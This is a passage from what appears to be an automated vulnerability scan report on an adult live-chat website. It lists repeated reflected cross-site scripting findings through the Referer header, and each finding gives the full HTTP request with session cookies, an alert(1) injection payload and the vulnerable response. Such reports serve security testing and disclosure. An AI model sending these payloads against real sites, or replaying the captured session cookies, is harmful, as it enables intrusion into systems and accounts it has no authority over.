Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=9792b'-alert(1)-'ba39155c916

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 25658
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
xt/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/&rf=http://www.google.com/search?hl=en^q=9792b'-alert(1)-'ba39155c916&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.958. http://imlive.com/live-sex-chats/couple/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67099'-alert(1)-'bb279cc6b57 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=67099'-alert(1)-'bb279cc6b57

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:29 GMT
Connection: close
Content-Length: 113880
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/&rf=http://www.google.com/search?hl=en^q=67099'-alert(1)-'bb279cc6b57&qs=cat=1^roomid=12&qs=cat=1^roomid=12&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.959. http://imlive.com/live-sex-chats/fetish/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/fetish/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8877f'-alert(1)-'f0d179f333a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/fetish/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=8877f'-alert(1)-'f0d179f333a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:07 GMT
Connection: close
Content-Length: 213457
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/&rf=http://www.google.com/search?hl=en^q=8877f'-alert(1)-'f0d179f333a&qs=cat=1^roomid=13&qs=cat=1^roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.960. http://imlive.com/live-sex-chats/fetish/categories/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/fetish/categories/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c608e'-alert(1)-'0606a3ceeb1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/fetish/categories/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=c608e'-alert(1)-'0606a3ceeb1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:36 GMT
Connection: close
Content-Length: 24548
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/&rf=http://www.google.com/search?hl=en^q=c608e'-alert(1)-'0606a3ceeb1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att
...[SNIP]...

4.961. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/free-sex-video-for-ipod/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96bee'-alert(1)-'306a0aabfe1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/free-sex-video-for-ipod/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=96bee'-alert(1)-'306a0aabfe1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 72576
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
script">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/&rf=http://www.google.com/search?hl=en^q=96bee'-alert(1)-'306a0aabfe1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.962. http://imlive.com/live-sex-chats/free-sex-video/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/free-sex-video/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c58'-alert(1)-'c21d7feff7f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/free-sex-video/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=38c58'-alert(1)-'c21d7feff7f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 51719
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/&rf=http://www.google.com/search?hl=en^q=38c58'-alert(1)-'c21d7feff7f&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.963. http://imlive.com/live-sex-chats/gay-couple/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/gay-couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 375ba'-alert(1)-'7a67cb13099 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/gay-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=375ba'-alert(1)-'7a67cb13099

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:05 GMT
Connection: close
Content-Length: 33567
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/&rf=http://www.google.com/search?hl=en^q=375ba'-alert(1)-'7a67cb13099&qs=cat=1^roomid=52&qs=cat=1^roomid=52&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.964. http://imlive.com/live-sex-chats/gay/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/gay/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ca5e'-alert(1)-'e9dfbf1b8ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/gay/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=2ca5e'-alert(1)-'e9dfbf1b8ea

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:34 GMT
Connection: close
Content-Length: 195039
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
